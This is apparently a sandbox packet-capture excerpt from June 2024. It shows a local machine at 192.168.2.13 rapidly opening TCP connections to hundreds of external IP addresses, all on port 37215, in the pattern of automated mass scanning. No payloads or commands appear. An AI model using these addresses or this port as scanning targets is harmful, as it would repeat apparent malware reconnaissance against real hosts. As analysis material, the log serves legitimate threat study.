                            Jun 10, 2024 15:37:59.930157900 CEST3040137215192.168.2.13197.61.115.35
                            Jun 10, 2024 15:37:59.930327892 CEST3454437215192.168.2.13156.205.253.53
                            Jun 10, 2024 15:37:59.930362940 CEST372153040141.140.253.20192.168.2.13
                            Jun 10, 2024 15:37:59.930373907 CEST3721530401156.10.203.90192.168.2.13
                            Jun 10, 2024 15:37:59.930381060 CEST3721530401197.250.143.229192.168.2.13
                            Jun 10, 2024 15:37:59.930399895 CEST3040137215192.168.2.1341.140.253.20
                            Jun 10, 2024 15:37:59.930407047 CEST3040137215192.168.2.13156.10.203.90
                            Jun 10, 2024 15:37:59.930414915 CEST372153040141.148.8.96192.168.2.13
                            Jun 10, 2024 15:37:59.930417061 CEST3040137215192.168.2.13197.250.143.229
                            Jun 10, 2024 15:37:59.930424929 CEST3721530401156.254.44.189192.168.2.13
                            Jun 10, 2024 15:37:59.930433035 CEST3721530401197.232.145.86192.168.2.13
                            Jun 10, 2024 15:37:59.930440903 CEST3721530401197.168.171.248192.168.2.13
                            Jun 10, 2024 15:37:59.930449963 CEST372153040141.57.180.175192.168.2.13
                            Jun 10, 2024 15:37:59.930449963 CEST3040137215192.168.2.1341.148.8.96
                            Jun 10, 2024 15:37:59.930459023 CEST3040137215192.168.2.13156.254.44.189
                            Jun 10, 2024 15:37:59.930459976 CEST3721530401156.95.172.102192.168.2.13
                            Jun 10, 2024 15:37:59.930465937 CEST3040137215192.168.2.13197.168.171.248
                            Jun 10, 2024 15:37:59.930469036 CEST372153040141.180.227.148192.168.2.13
                            Jun 10, 2024 15:37:59.930469990 CEST3040137215192.168.2.13197.232.145.86
                            Jun 10, 2024 15:37:59.930480003 CEST3721530401197.37.133.232192.168.2.13
                            Jun 10, 2024 15:37:59.930483103 CEST3040137215192.168.2.1341.57.180.175
                            Jun 10, 2024 15:37:59.930488110 CEST372153040141.17.133.38192.168.2.13
                            Jun 10, 2024 15:37:59.930495977 CEST3040137215192.168.2.1341.180.227.148
                            Jun 10, 2024 15:37:59.930495977 CEST3040137215192.168.2.13156.95.172.102
                            Jun 10, 2024 15:37:59.930496931 CEST3721530401156.71.2.44192.168.2.13
                            Jun 10, 2024 15:37:59.930512905 CEST372153040141.96.216.173192.168.2.13
                            Jun 10, 2024 15:37:59.930515051 CEST3040137215192.168.2.13197.37.133.232
                            Jun 10, 2024 15:37:59.930515051 CEST3040137215192.168.2.1341.17.133.38
                            Jun 10, 2024 15:37:59.930521965 CEST3721530401156.74.190.112192.168.2.13
                            Jun 10, 2024 15:37:59.930530071 CEST3721530401197.76.179.174192.168.2.13
                            Jun 10, 2024 15:37:59.930537939 CEST3040137215192.168.2.13156.71.2.44
                            Jun 10, 2024 15:37:59.930546045 CEST3040137215192.168.2.1341.96.216.173
                            Jun 10, 2024 15:37:59.930546045 CEST3040137215192.168.2.13156.74.190.112
                            Jun 10, 2024 15:37:59.930568933 CEST3721530401197.19.235.72192.168.2.13
                            Jun 10, 2024 15:37:59.930572987 CEST3040137215192.168.2.13197.76.179.174
                            Jun 10, 2024 15:37:59.930577993 CEST3721530401156.236.155.191192.168.2.13
                            Jun 10, 2024 15:37:59.930587053 CEST3721530401156.214.128.73192.168.2.13
                            Jun 10, 2024 15:37:59.930597067 CEST3721530401156.157.187.149192.168.2.13
                            Jun 10, 2024 15:37:59.930602074 CEST3040137215192.168.2.13197.19.235.72
                            Jun 10, 2024 15:37:59.930605888 CEST3721530401156.95.114.158192.168.2.13
                            Jun 10, 2024 15:37:59.930605888 CEST3040137215192.168.2.13156.236.155.191
                            Jun 10, 2024 15:37:59.930623055 CEST3721530401197.215.172.135192.168.2.13
                            Jun 10, 2024 15:37:59.930632114 CEST372153040141.143.17.139192.168.2.13
                            Jun 10, 2024 15:37:59.930632114 CEST3040137215192.168.2.13156.214.128.73
                            Jun 10, 2024 15:37:59.930638075 CEST3040137215192.168.2.13156.157.187.149
                            Jun 10, 2024 15:37:59.930639982 CEST3721530401197.134.224.38192.168.2.13
                            Jun 10, 2024 15:37:59.930646896 CEST3040137215192.168.2.13156.95.114.158
                            Jun 10, 2024 15:37:59.930649042 CEST372153040141.46.83.152192.168.2.13
                            Jun 10, 2024 15:37:59.930655003 CEST3040137215192.168.2.13197.215.172.135
                            Jun 10, 2024 15:37:59.930659056 CEST3721530401197.122.48.209192.168.2.13
                            Jun 10, 2024 15:37:59.930669069 CEST3721530401156.56.244.116192.168.2.13
                            Jun 10, 2024 15:37:59.930675030 CEST3040137215192.168.2.1341.143.17.139
                            Jun 10, 2024 15:37:59.930675983 CEST3040137215192.168.2.13197.134.224.38
                            Jun 10, 2024 15:37:59.930684090 CEST3040137215192.168.2.1341.46.83.152
                            Jun 10, 2024 15:37:59.930684090 CEST3040137215192.168.2.13197.122.48.209
                            Jun 10, 2024 15:37:59.930696964 CEST3040137215192.168.2.13156.56.244.116
                            Jun 10, 2024 15:37:59.930929899 CEST3283437215192.168.2.13156.249.70.243
                            Jun 10, 2024 15:37:59.930929899 CEST3283437215192.168.2.13156.249.70.243
                            Jun 10, 2024 15:37:59.931155920 CEST372153040141.80.149.177192.168.2.13
                            Jun 10, 2024 15:37:59.931186914 CEST3040137215192.168.2.1341.80.149.177
                            Jun 10, 2024 15:37:59.931201935 CEST3721530401156.3.31.237192.168.2.13
                            Jun 10, 2024 15:37:59.931210995 CEST3721530401197.19.101.209192.168.2.13
                            Jun 10, 2024 15:37:59.931220055 CEST3721530401197.32.31.82192.168.2.13
                            Jun 10, 2024 15:37:59.931236982 CEST3721530401156.163.128.46192.168.2.13
                            Jun 10, 2024 15:37:59.931236982 CEST3040137215192.168.2.13156.3.31.237
                            Jun 10, 2024 15:37:59.931238890 CEST3040137215192.168.2.13197.19.101.209
                            Jun 10, 2024 15:37:59.931246042 CEST3721530401197.213.62.250192.168.2.13
                            Jun 10, 2024 15:37:59.931246996 CEST3040137215192.168.2.13197.32.31.82
                            Jun 10, 2024 15:37:59.931255102 CEST3721530401156.196.212.50192.168.2.13
                            Jun 10, 2024 15:37:59.931265116 CEST372153040141.173.252.224192.168.2.13
                            Jun 10, 2024 15:37:59.931272984 CEST3721530401156.151.24.19192.168.2.13
                            Jun 10, 2024 15:37:59.931274891 CEST3040137215192.168.2.13197.213.62.250
                            Jun 10, 2024 15:37:59.931277990 CEST3040137215192.168.2.13156.163.128.46
                            Jun 10, 2024 15:37:59.931281090 CEST3721530401156.107.208.91192.168.2.13
                            Jun 10, 2024 15:37:59.931287050 CEST3040137215192.168.2.13156.196.212.50
                            Jun 10, 2024 15:37:59.931287050 CEST3040137215192.168.2.1341.173.252.224
                            Jun 10, 2024 15:37:59.931291103 CEST3721530401156.17.158.142192.168.2.13
                            Jun 10, 2024 15:37:59.931301117 CEST3721530401197.175.213.47192.168.2.13
                            Jun 10, 2024 15:37:59.931307077 CEST3040137215192.168.2.13156.151.24.19
                            Jun 10, 2024 15:37:59.931308031 CEST3040137215192.168.2.13156.107.208.91
                            Jun 10, 2024 15:37:59.931313992 CEST3040137215192.168.2.13156.17.158.142
                            Jun 10, 2024 15:37:59.931318045 CEST3721530401197.124.39.48192.168.2.13
                            Jun 10, 2024 15:37:59.931325912 CEST3721530401197.158.31.137192.168.2.13
                            Jun 10, 2024 15:37:59.931330919 CEST3040137215192.168.2.13197.175.213.47
                            Jun 10, 2024 15:37:59.931334972 CEST372153040141.110.45.113192.168.2.13
                            Jun 10, 2024 15:37:59.931344032 CEST372153040141.179.71.71192.168.2.13
                            Jun 10, 2024 15:37:59.931346893 CEST3040137215192.168.2.13197.124.39.48
                            Jun 10, 2024 15:37:59.931351900 CEST3721530401156.4.180.106192.168.2.13
                            Jun 10, 2024 15:37:59.931353092 CEST3040137215192.168.2.13197.158.31.137
                            Jun 10, 2024 15:37:59.931360006 CEST3357837215192.168.2.13156.249.70.243
                            Jun 10, 2024 15:37:59.931360960 CEST3040137215192.168.2.1341.110.45.113
                            Jun 10, 2024 15:37:59.931360960 CEST372153040141.207.71.57192.168.2.13
                            Jun 10, 2024 15:37:59.931370020 CEST3721530401156.5.252.171192.168.2.13
                            Jun 10, 2024 15:37:59.931377888 CEST372153040141.38.204.137192.168.2.13
                            Jun 10, 2024 15:37:59.931379080 CEST3040137215192.168.2.1341.179.71.71
                            Jun 10, 2024 15:37:59.931382895 CEST3040137215192.168.2.1341.207.71.57
                            Jun 10, 2024 15:37:59.931386948 CEST372153040141.102.135.121192.168.2.13
                            Jun 10, 2024 15:37:59.931386948 CEST3040137215192.168.2.13156.4.180.106
                            Jun 10, 2024 15:37:59.931396008 CEST3040137215192.168.2.13156.5.252.171
                            Jun 10, 2024 15:37:59.931396008 CEST372153040141.205.92.11192.168.2.13
                            Jun 10, 2024 15:37:59.931405067 CEST3040137215192.168.2.1341.38.204.137
                            Jun 10, 2024 15:37:59.931413889 CEST3721530401197.167.172.253192.168.2.13
                            Jun 10, 2024 15:37:59.931422949 CEST3721530401156.248.183.57192.168.2.13
                            Jun 10, 2024 15:37:59.931422949 CEST3040137215192.168.2.1341.102.135.121
                            Jun 10, 2024 15:37:59.931423903 CEST3040137215192.168.2.1341.205.92.11
                            Jun 10, 2024 15:37:59.931432009 CEST372153040141.98.105.119192.168.2.13
                            Jun 10, 2024 15:37:59.931441069 CEST3721530401156.115.8.112192.168.2.13
                            Jun 10, 2024 15:37:59.931448936 CEST372153040141.104.143.130192.168.2.13
                            Jun 10, 2024 15:37:59.931452036 CEST3040137215192.168.2.13197.167.172.253
                            Jun 10, 2024 15:37:59.931457043 CEST3721530401156.160.189.150192.168.2.13
                            Jun 10, 2024 15:37:59.931457996 CEST3040137215192.168.2.13156.248.183.57
                            Jun 10, 2024 15:37:59.931463957 CEST3040137215192.168.2.1341.98.105.119
                            Jun 10, 2024 15:37:59.931471109 CEST3040137215192.168.2.13156.115.8.112
                            Jun 10, 2024 15:37:59.931473970 CEST3040137215192.168.2.1341.104.143.130
                            Jun 10, 2024 15:37:59.931482077 CEST3040137215192.168.2.13156.160.189.150
                            Jun 10, 2024 15:37:59.931782961 CEST3721530401156.67.73.136192.168.2.13
                            Jun 10, 2024 15:37:59.931813002 CEST3040137215192.168.2.13156.67.73.136
                            Jun 10, 2024 15:37:59.931832075 CEST372153040141.8.64.229192.168.2.13
                            Jun 10, 2024 15:37:59.931839943 CEST372153040141.37.120.162192.168.2.13
                            Jun 10, 2024 15:37:59.931849003 CEST3721530401156.12.136.95192.168.2.13
                            Jun 10, 2024 15:37:59.931858063 CEST3721530401197.5.12.63192.168.2.13
                            Jun 10, 2024 15:37:59.931865931 CEST3721530401156.3.24.43192.168.2.13
                            Jun 10, 2024 15:37:59.931868076 CEST3040137215192.168.2.1341.8.64.229
                            Jun 10, 2024 15:37:59.931874037 CEST3040137215192.168.2.1341.37.120.162
                            Jun 10, 2024 15:37:59.931874037 CEST3040137215192.168.2.13156.12.136.95
                            Jun 10, 2024 15:37:59.931880951 CEST3721530401156.206.234.253192.168.2.13
                            Jun 10, 2024 15:37:59.931890965 CEST3721530401156.89.233.74192.168.2.13
                            Jun 10, 2024 15:37:59.931898117 CEST3721530401156.35.190.239192.168.2.13
                            Jun 10, 2024 15:37:59.931900978 CEST3040137215192.168.2.13197.5.12.63
                            Jun 10, 2024 15:37:59.931906939 CEST372153040141.88.95.108192.168.2.13
                            Jun 10, 2024 15:37:59.931910038 CEST3040137215192.168.2.13156.3.24.43
                            Jun 10, 2024 15:37:59.931915045 CEST3721530401197.62.237.91192.168.2.13
                            Jun 10, 2024 15:37:59.931916952 CEST3040137215192.168.2.13156.206.234.253
                            Jun 10, 2024 15:37:59.931921959 CEST3040137215192.168.2.13156.89.233.74
                            Jun 10, 2024 15:37:59.931922913 CEST3721530401197.85.105.98192.168.2.13
                            Jun 10, 2024 15:37:59.931926012 CEST3040137215192.168.2.13156.35.190.239
                            Jun 10, 2024 15:37:59.931931019 CEST3040137215192.168.2.1341.88.95.108
                            Jun 10, 2024 15:37:59.931936979 CEST3040137215192.168.2.13197.62.237.91
                            Jun 10, 2024 15:37:59.931950092 CEST3040137215192.168.2.13197.85.105.98
                            Jun 10, 2024 15:37:59.931967020 CEST3761037215192.168.2.13156.89.39.231
                            Jun 10, 2024 15:37:59.931977034 CEST3761037215192.168.2.13156.89.39.231
                            Jun 10, 2024 15:37:59.932003021 CEST3721530401197.84.231.181192.168.2.13
                            Jun 10, 2024 15:37:59.932012081 CEST372153040141.221.248.68192.168.2.13
                            Jun 10, 2024 15:37:59.932019949 CEST3721530401156.84.66.36192.168.2.13
                            Jun 10, 2024 15:37:59.932029009 CEST372153040141.126.65.112192.168.2.13
                            Jun 10, 2024 15:37:59.932037115 CEST3721530401197.185.247.176192.168.2.13
                            Jun 10, 2024 15:37:59.932034969 CEST3040137215192.168.2.13197.84.231.181
                            Jun 10, 2024 15:37:59.932044029 CEST3040137215192.168.2.13156.84.66.36
                            Jun 10, 2024 15:37:59.932044983 CEST372153040141.69.41.18192.168.2.13
                            Jun 10, 2024 15:37:59.932054043 CEST3040137215192.168.2.1341.126.65.112
                            Jun 10, 2024 15:37:59.932054043 CEST372153040141.16.238.254192.168.2.13
                            Jun 10, 2024 15:37:59.932054996 CEST3040137215192.168.2.1341.221.248.68
                            Jun 10, 2024 15:37:59.932059050 CEST3040137215192.168.2.13197.185.247.176
                            Jun 10, 2024 15:37:59.932061911 CEST3721530401197.149.60.7192.168.2.13
                            Jun 10, 2024 15:37:59.932066917 CEST3040137215192.168.2.1341.69.41.18
                            Jun 10, 2024 15:37:59.932071924 CEST372153040141.65.77.99192.168.2.13
                            Jun 10, 2024 15:37:59.932080984 CEST3721530401156.171.46.131192.168.2.13
                            Jun 10, 2024 15:37:59.932084084 CEST3040137215192.168.2.1341.16.238.254
                            Jun 10, 2024 15:37:59.932089090 CEST372153040141.59.186.61192.168.2.13
                            Jun 10, 2024 15:37:59.932090998 CEST3040137215192.168.2.13197.149.60.7
                            Jun 10, 2024 15:37:59.932096958 CEST3721530401156.163.247.70192.168.2.13
                            Jun 10, 2024 15:37:59.932106018 CEST3040137215192.168.2.13156.171.46.131
                            Jun 10, 2024 15:37:59.932106018 CEST3721530401156.112.73.7192.168.2.13
                            Jun 10, 2024 15:37:59.932111979 CEST3040137215192.168.2.1341.65.77.99
                            Jun 10, 2024 15:37:59.932118893 CEST3040137215192.168.2.1341.59.186.61
                            Jun 10, 2024 15:37:59.932120085 CEST372153040141.120.164.192192.168.2.13
                            Jun 10, 2024 15:37:59.932122946 CEST3040137215192.168.2.13156.163.247.70
                            Jun 10, 2024 15:37:59.932130098 CEST372153040141.34.12.157192.168.2.13
                            Jun 10, 2024 15:37:59.932137966 CEST3721530401156.131.86.79192.168.2.13
                            Jun 10, 2024 15:37:59.932141066 CEST3040137215192.168.2.1341.120.164.192
                            Jun 10, 2024 15:37:59.932141066 CEST3040137215192.168.2.13156.112.73.7
                            Jun 10, 2024 15:37:59.932152033 CEST3040137215192.168.2.1341.34.12.157
                            Jun 10, 2024 15:37:59.932169914 CEST3040137215192.168.2.13156.131.86.79
                            Jun 10, 2024 15:37:59.932369947 CEST372153040141.42.133.1192.168.2.13
                            Jun 10, 2024 15:37:59.932379007 CEST372153040141.19.208.240192.168.2.13
                            Jun 10, 2024 15:37:59.932387114 CEST372153040141.113.108.10192.168.2.13
                            Jun 10, 2024 15:37:59.932394981 CEST3721530401156.200.236.105192.168.2.13
                            Jun 10, 2024 15:37:59.932413101 CEST3721530401197.166.118.183192.168.2.13
                            Jun 10, 2024 15:37:59.932416916 CEST3040137215192.168.2.13156.200.236.105
                            Jun 10, 2024 15:37:59.932416916 CEST3040137215192.168.2.1341.19.208.240
                            Jun 10, 2024 15:37:59.932419062 CEST3040137215192.168.2.1341.42.133.1
                            Jun 10, 2024 15:37:59.932421923 CEST372153040141.77.125.16192.168.2.13
                            Jun 10, 2024 15:37:59.932424068 CEST3040137215192.168.2.1341.113.108.10
                            Jun 10, 2024 15:37:59.932430983 CEST372153040141.120.128.38192.168.2.13
                            Jun 10, 2024 15:37:59.932439089 CEST3721530401197.58.128.241192.168.2.13
                            Jun 10, 2024 15:37:59.932446957 CEST372153040141.140.234.6192.168.2.13
                            Jun 10, 2024 15:37:59.932456017 CEST3721530401156.21.3.180192.168.2.13
                            Jun 10, 2024 15:37:59.932459116 CEST3040137215192.168.2.13197.166.118.183
                            Jun 10, 2024 15:37:59.932460070 CEST3040137215192.168.2.1341.120.128.38
                            Jun 10, 2024 15:37:59.932461023 CEST3040137215192.168.2.1341.77.125.16
                            Jun 10, 2024 15:37:59.932463884 CEST3721549110156.143.243.166192.168.2.13
                            Jun 10, 2024 15:37:59.932466030 CEST3040137215192.168.2.13197.58.128.241
                            Jun 10, 2024 15:37:59.932472944 CEST3721549886156.143.243.166192.168.2.13
                            Jun 10, 2024 15:37:59.932480097 CEST3040137215192.168.2.1341.140.234.6
                            Jun 10, 2024 15:37:59.932497025 CEST3040137215192.168.2.13156.21.3.180
                            Jun 10, 2024 15:37:59.932497978 CEST3835037215192.168.2.13156.89.39.231
                            Jun 10, 2024 15:37:59.932499886 CEST4988637215192.168.2.13156.143.243.166
                            Jun 10, 2024 15:37:59.932521105 CEST372156088241.1.16.245192.168.2.13
                            Jun 10, 2024 15:37:59.932533026 CEST372153342241.1.16.245192.168.2.13
                            Jun 10, 2024 15:37:59.932549000 CEST372155532241.112.237.34192.168.2.13
                            Jun 10, 2024 15:37:59.932563066 CEST3342237215192.168.2.1341.1.16.245
                            Jun 10, 2024 15:37:59.933051109 CEST5310037215192.168.2.1341.97.23.92
                            Jun 10, 2024 15:37:59.933051109 CEST5310037215192.168.2.1341.97.23.92
                            Jun 10, 2024 15:37:59.933444023 CEST5383637215192.168.2.1341.97.23.92
                            Jun 10, 2024 15:37:59.933965921 CEST5646037215192.168.2.13156.32.132.93
                            Jun 10, 2024 15:37:59.933965921 CEST5646037215192.168.2.13156.32.132.93
                            Jun 10, 2024 15:37:59.934375048 CEST5719237215192.168.2.13156.32.132.93
                            Jun 10, 2024 15:37:59.934919119 CEST5637837215192.168.2.13156.60.90.199
                            Jun 10, 2024 15:37:59.934919119 CEST5637837215192.168.2.13156.60.90.199
                            Jun 10, 2024 15:37:59.934978962 CEST372155609041.112.237.34192.168.2.13
                            Jun 10, 2024 15:37:59.934988976 CEST3721560470156.57.11.197192.168.2.13
                            Jun 10, 2024 15:37:59.935024023 CEST5609037215192.168.2.1341.112.237.34
                            Jun 10, 2024 15:37:59.935334921 CEST5710637215192.168.2.13156.60.90.199
                            Jun 10, 2024 15:37:59.935353994 CEST3721533002156.57.11.197192.168.2.13
                            Jun 10, 2024 15:37:59.935364008 CEST3721544436156.190.41.183192.168.2.13
                            Jun 10, 2024 15:37:59.935389042 CEST3300237215192.168.2.13156.57.11.197
                            Jun 10, 2024 15:37:59.935682058 CEST3721545196156.190.41.183192.168.2.13
                            Jun 10, 2024 15:37:59.935715914 CEST4519637215192.168.2.13156.190.41.183
                            Jun 10, 2024 15:37:59.935832024 CEST372153306441.251.69.196192.168.2.13
                            Jun 10, 2024 15:37:59.935899973 CEST3850837215192.168.2.13156.67.226.82
                            Jun 10, 2024 15:37:59.935899973 CEST3850837215192.168.2.13156.67.226.82
                            Jun 10, 2024 15:37:59.936089039 CEST372153382041.251.69.196192.168.2.13
                            Jun 10, 2024 15:37:59.936129093 CEST3382037215192.168.2.1341.251.69.196
                            Jun 10, 2024 15:37:59.936258078 CEST3721541114156.18.195.164192.168.2.13
                            Jun 10, 2024 15:37:59.936305046 CEST3923237215192.168.2.13156.67.226.82
                            Jun 10, 2024 15:37:59.936553001 CEST3721541866156.18.195.164192.168.2.13
                            Jun 10, 2024 15:37:59.936570883 CEST372154568241.117.101.224192.168.2.13
                            Jun 10, 2024 15:37:59.936589003 CEST4186637215192.168.2.13156.18.195.164
                            Jun 10, 2024 15:37:59.936805964 CEST372154643441.117.101.224192.168.2.13
                            Jun 10, 2024 15:37:59.936836958 CEST4791837215192.168.2.13197.192.210.171
                            Jun 10, 2024 15:37:59.936844110 CEST4643437215192.168.2.1341.117.101.224
                            Jun 10, 2024 15:37:59.936849117 CEST4791837215192.168.2.13197.192.210.171
                            Jun 10, 2024 15:37:59.937263012 CEST4863837215192.168.2.13197.192.210.171
                            Jun 10, 2024 15:37:59.937283039 CEST3721533796156.205.253.53192.168.2.13
                            Jun 10, 2024 15:37:59.937555075 CEST3721534544156.205.253.53192.168.2.13
                            Jun 10, 2024 15:37:59.937601089 CEST3454437215192.168.2.13156.205.253.53
                            Jun 10, 2024 15:37:59.937774897 CEST5108837215192.168.2.13156.185.143.113
                            Jun 10, 2024 15:37:59.937774897 CEST5108837215192.168.2.13156.185.143.113
                            Jun 10, 2024 15:37:59.938011885 CEST3721532834156.249.70.243192.168.2.13
                            Jun 10, 2024 15:37:59.938021898 CEST3721533578156.249.70.243192.168.2.13
                            Jun 10, 2024 15:37:59.938052893 CEST3357837215192.168.2.13156.249.70.243
                            Jun 10, 2024 15:37:59.938196898 CEST5180437215192.168.2.13156.185.143.113
                            Jun 10, 2024 15:37:59.938421011 CEST3721537610156.89.39.231192.168.2.13
                            Jun 10, 2024 15:37:59.938431025 CEST3721538350156.89.39.231192.168.2.13
                            Jun 10, 2024 15:37:59.938466072 CEST3835037215192.168.2.13156.89.39.231
                            Jun 10, 2024 15:37:59.938570023 CEST372155310041.97.23.92192.168.2.13
                            Jun 10, 2024 15:37:59.938587904 CEST372155383641.97.23.92192.168.2.13
                            Jun 10, 2024 15:37:59.938616037 CEST5383637215192.168.2.1341.97.23.92
                            Jun 10, 2024 15:37:59.938714981 CEST4563637215192.168.2.13197.11.121.199
                            Jun 10, 2024 15:37:59.938714981 CEST4563637215192.168.2.13197.11.121.199
                            Jun 10, 2024 15:37:59.938870907 CEST3721556460156.32.132.93192.168.2.13
                            Jun 10, 2024 15:37:59.939121008 CEST4634837215192.168.2.13197.11.121.199
                            Jun 10, 2024 15:37:59.939249992 CEST3721557192156.32.132.93192.168.2.13
                            Jun 10, 2024 15:37:59.939287901 CEST5719237215192.168.2.13156.32.132.93
                            Jun 10, 2024 15:37:59.939522982 CEST5676837215192.168.2.1341.92.127.129
                            Jun 10, 2024 15:37:59.939533949 CEST5676837215192.168.2.1341.92.127.129
                            Jun 10, 2024 15:37:59.939841986 CEST3721556378156.60.90.199192.168.2.13
                            Jun 10, 2024 15:37:59.939846039 CEST5747637215192.168.2.1341.92.127.129
                            Jun 10, 2024 15:37:59.940170050 CEST3721557106156.60.90.199192.168.2.13
                            Jun 10, 2024 15:37:59.940202951 CEST5710637215192.168.2.13156.60.90.199
                            Jun 10, 2024 15:37:59.940258026 CEST4962637215192.168.2.13197.53.161.229
                            Jun 10, 2024 15:37:59.940258026 CEST4962637215192.168.2.13197.53.161.229
                            Jun 10, 2024 15:37:59.940583944 CEST5033237215192.168.2.13197.53.161.229
                            Jun 10, 2024 15:37:59.940721989 CEST3721538508156.67.226.82192.168.2.13
                            Jun 10, 2024 15:37:59.941005945 CEST3351437215192.168.2.13156.78.13.161
                            Jun 10, 2024 15:37:59.941005945 CEST3351437215192.168.2.13156.78.13.161
                            Jun 10, 2024 15:37:59.941117048 CEST3721539232156.67.226.82192.168.2.13
                            Jun 10, 2024 15:37:59.941157103 CEST3923237215192.168.2.13156.67.226.82
                            Jun 10, 2024 15:37:59.941318035 CEST3421637215192.168.2.13156.78.13.161
                            Jun 10, 2024 15:37:59.941699028 CEST3721547918197.192.210.171192.168.2.13
                            Jun 10, 2024 15:37:59.941715002 CEST4128237215192.168.2.13156.97.36.34
                            Jun 10, 2024 15:37:59.941715002 CEST4128237215192.168.2.13156.97.36.34
                            Jun 10, 2024 15:37:59.942043066 CEST4198237215192.168.2.13156.97.36.34
                            Jun 10, 2024 15:37:59.942087889 CEST3721548638197.192.210.171192.168.2.13
                            Jun 10, 2024 15:37:59.942126989 CEST4863837215192.168.2.13197.192.210.171
                            Jun 10, 2024 15:37:59.942478895 CEST5560637215192.168.2.13197.142.203.17
                            Jun 10, 2024 15:37:59.942480087 CEST5560637215192.168.2.13197.142.203.17
                            Jun 10, 2024 15:37:59.942650080 CEST3721551088156.185.143.113192.168.2.13
                            Jun 10, 2024 15:37:59.942806005 CEST5630237215192.168.2.13197.142.203.17
                            Jun 10, 2024 15:37:59.942996025 CEST3721551804156.185.143.113192.168.2.13
                            Jun 10, 2024 15:37:59.943030119 CEST5180437215192.168.2.13156.185.143.113
                            Jun 10, 2024 15:37:59.943219900 CEST3409237215192.168.2.1341.30.124.178
                            Jun 10, 2024 15:37:59.943233967 CEST3409237215192.168.2.1341.30.124.178
                            Jun 10, 2024 15:37:59.943542004 CEST3721545636197.11.121.199192.168.2.13
                            Jun 10, 2024 15:37:59.943556070 CEST3478437215192.168.2.1341.30.124.178
                            Jun 10, 2024 15:37:59.943938971 CEST3721546348197.11.121.199192.168.2.13
                            Jun 10, 2024 15:37:59.943965912 CEST6061437215192.168.2.13156.10.20.117
                            Jun 10, 2024 15:37:59.943965912 CEST6061437215192.168.2.13156.10.20.117
                            Jun 10, 2024 15:37:59.943978071 CEST4634837215192.168.2.13197.11.121.199
                            Jun 10, 2024 15:37:59.944281101 CEST3307037215192.168.2.13156.10.20.117
                            Jun 10, 2024 15:37:59.944374084 CEST372155676841.92.127.129192.168.2.13
                            Jun 10, 2024 15:37:59.944650888 CEST372155747641.92.127.129192.168.2.13
                            Jun 10, 2024 15:37:59.944688082 CEST5747637215192.168.2.1341.92.127.129
                            Jun 10, 2024 15:37:59.944688082 CEST4664437215192.168.2.13156.79.10.64
                            Jun 10, 2024 15:37:59.944699049 CEST4664437215192.168.2.13156.79.10.64
                            Jun 10, 2024 15:37:59.945005894 CEST4732837215192.168.2.13156.79.10.64
                            Jun 10, 2024 15:37:59.945209980 CEST3721549626197.53.161.229192.168.2.13
                            Jun 10, 2024 15:37:59.945411921 CEST5376837215192.168.2.13156.31.27.232
                            Jun 10, 2024 15:37:59.945411921 CEST5376837215192.168.2.13156.31.27.232
                            Jun 10, 2024 15:37:59.945415020 CEST3721550332197.53.161.229192.168.2.13
                            Jun 10, 2024 15:37:59.945451975 CEST5033237215192.168.2.13197.53.161.229
                            Jun 10, 2024 15:37:59.945727110 CEST5444837215192.168.2.13156.31.27.232
                            Jun 10, 2024 15:37:59.945852995 CEST3721533514156.78.13.161192.168.2.13
                            Jun 10, 2024 15:37:59.946134090 CEST3349237215192.168.2.13197.125.224.191
                            Jun 10, 2024 15:37:59.946146965 CEST3349237215192.168.2.13197.125.224.191
                            Jun 10, 2024 15:37:59.946182966 CEST3721534216156.78.13.161192.168.2.13
                            Jun 10, 2024 15:37:59.946218967 CEST3421637215192.168.2.13156.78.13.161
                            Jun 10, 2024 15:37:59.946448088 CEST3417037215192.168.2.13197.125.224.191
                            Jun 10, 2024 15:37:59.946537018 CEST3721541282156.97.36.34192.168.2.13
                            Jun 10, 2024 15:37:59.946835995 CEST5348237215192.168.2.13156.82.1.213
                            Jun 10, 2024 15:37:59.946835995 CEST5348237215192.168.2.13156.82.1.213
                            Jun 10, 2024 15:37:59.946966887 CEST3721541982156.97.36.34192.168.2.13
                            Jun 10, 2024 15:37:59.947005987 CEST4198237215192.168.2.13156.97.36.34
                            Jun 10, 2024 15:37:59.947135925 CEST5415637215192.168.2.13156.82.1.213
                            Jun 10, 2024 15:37:59.947305918 CEST3721555606197.142.203.17192.168.2.13
                            Jun 10, 2024 15:37:59.947535038 CEST3989437215192.168.2.13197.56.205.250
                            Jun 10, 2024 15:37:59.947546005 CEST3989437215192.168.2.13197.56.205.250
                            Jun 10, 2024 15:37:59.947669983 CEST3721556302197.142.203.17192.168.2.13
                            Jun 10, 2024 15:37:59.947702885 CEST5630237215192.168.2.13197.142.203.17
                            Jun 10, 2024 15:37:59.947860003 CEST4056637215192.168.2.13197.56.205.250
                            Jun 10, 2024 15:37:59.948153973 CEST372153409241.30.124.178192.168.2.13
                            Jun 10, 2024 15:37:59.948276043 CEST4644237215192.168.2.13156.98.83.218
                            Jun 10, 2024 15:37:59.948293924 CEST4644237215192.168.2.13156.98.83.218
                            Jun 10, 2024 15:37:59.948419094 CEST372153478441.30.124.178192.168.2.13
                            Jun 10, 2024 15:37:59.948462009 CEST3478437215192.168.2.1341.30.124.178
                            Jun 10, 2024 15:37:59.948610067 CEST4711037215192.168.2.13156.98.83.218
                            Jun 10, 2024 15:37:59.948786974 CEST3721560614156.10.20.117192.168.2.13
                            Jun 10, 2024 15:37:59.948996067 CEST4210837215192.168.2.13197.215.149.213
                            Jun 10, 2024 15:37:59.948996067 CEST4210837215192.168.2.13197.215.149.213
                            Jun 10, 2024 15:37:59.949137926 CEST3721533070156.10.20.117192.168.2.13
                            Jun 10, 2024 15:37:59.949174881 CEST3307037215192.168.2.13156.10.20.117
                            Jun 10, 2024 15:37:59.949312925 CEST4277237215192.168.2.13197.215.149.213
                            Jun 10, 2024 15:37:59.949529886 CEST3721546644156.79.10.64192.168.2.13
                            Jun 10, 2024 15:37:59.949732065 CEST5910037215192.168.2.13156.216.173.116
                            Jun 10, 2024 15:37:59.949753046 CEST5910037215192.168.2.13156.216.173.116
                            Jun 10, 2024 15:37:59.949825048 CEST3721547328156.79.10.64192.168.2.13
                            Jun 10, 2024 15:37:59.949865103 CEST4732837215192.168.2.13156.79.10.64
                            Jun 10, 2024 15:37:59.950094938 CEST5976037215192.168.2.13156.216.173.116
                            Jun 10, 2024 15:37:59.950423956 CEST3721553768156.31.27.232192.168.2.13
                            Jun 10, 2024 15:37:59.950532913 CEST3896037215192.168.2.1341.86.126.31
                            Jun 10, 2024 15:37:59.950532913 CEST3896037215192.168.2.1341.86.126.31
                            Jun 10, 2024 15:37:59.950608015 CEST3721554448156.31.27.232192.168.2.13
